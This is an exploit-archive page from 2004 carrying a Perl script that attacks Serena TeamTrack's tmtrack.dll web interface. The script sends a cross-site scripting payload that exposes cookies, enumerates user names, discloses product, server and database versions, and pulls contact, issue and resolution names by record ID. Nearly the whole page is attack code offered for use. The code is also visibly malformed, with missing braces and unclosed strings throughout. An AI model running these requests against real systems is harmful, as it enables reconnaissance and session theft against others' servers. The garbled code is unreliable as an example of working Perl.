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Multiple Serena TeamTrack Exploit Codes
来源:vfocus.net 作者:vfocus 发布时间:2004-07-23  

Multiple Serena TeamTrack Exploit Codes


use IO::Socket;

if (($#ARGV+1) < 3)
print "Serena_hack.pl option host path
\t1 - Cross Site Scripting issue
\t2 - Enumerate users (First name)
\t3 - System information disclosure
\t4 - Contact name (default is Record ID 1)
\t5 - Name of Issue (default is Record ID 1)
\t6 - Name of Resolution (default is Record ID 1)

$option = $ARGV[0];
$host = $ARGV[1];
$path = $ARGV[2];

if ($option > 6)
print "No such option\n";

$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "connected\n";


my $http;

if ($option == 1)
$http = "GET
/$path/tmtrack.dll?LoginPage&Template=loginform&Message=<script>alert(document.cookie)</script> HTTP/1.0

# Cookie/Cross Site Scripting

if ($option == 2)
{ # Enumerate users
$http = "GET /$path/tmtrack.dll?LoginPage&Template=user HTTP/1.0


if ($option == 3)
{ # Information disclosure
$http = "GET /$path/tmtrack.dll?LoginPage&Template=about HTTP/1.0


if ($option == 4)
{ # Fullname for a certain ID
$RecordID = 1;
$http = "GET
/$path/tmtrack.dll?LoginPage&Template=viewbody&recordid=$RecordID&tableid=38 HTTP/1.0


if ($option == 5)
{ # Issue name
$RecordID = 1;
$http = "GET
/$path/tmtrack.dll?LoginPage&Template=viewbody&recordid=$RecordID&tableid=41 HTTP/1.0


if ($option == 6)
{ # Resolution name
$RecordID = 1;
$http = "GET
/$path/tmtrack.dll?LoginPage&Template=viewbody&recordid=$RecordID&tableid=42 HTTP/1.0


print "HTTP: [$http]\n";
print $remote $http;
print "Sent\n";

my $display = 1;

if ($option == 2)
{ # Enumerate names
$display = 0;
# No need to display the complete HTML

if ($option == 3)
{ # System information disclosure
$display = 0;

if ($option == 4 || $option == 5 || $option == 6)
$display = 0;

while (<$remote>)
if ($option == 2) # Enumerate names
if (/<OPTION VALUE=([^>]+)>([^<]+)<\/OPTION>/)
print "ID: $1, Name: $2\n";

if ($option == 3)
if (/<input type="hidden" name="Product_Version.*" value="[ ]+([^"]+)"/)
print "Product version: $1\n";
if (/<input type="hidden" name="WebServer.*" value="[ ]+([^"]+)"/)
print "Web Server version: $1\n";
if (/<input type="hidden" name="WebServer_OS.*" value="[ ]+([^"]+)"/)
print "Server version: $1\n";
if (/<input type="hidden" name="DBMS.*" value="[ ]+([^"]+)"/)
print "Database version: $1\n";

if ($option == 4)
if (/Contact Details<\/span> - ([^<]+)</g)
print "Full name: $1\n";

if ($option == 5)
if (/Problem Details<\/span> - ([^<]+)/g)
print "Issue name: $1\n";

if ($option == 6)
if (/Resolution Details<\/span> - ([^<]+)/g)
print "Resolution name: $1\n";

if ($display)
print $_;
print "\n";

close $remote;

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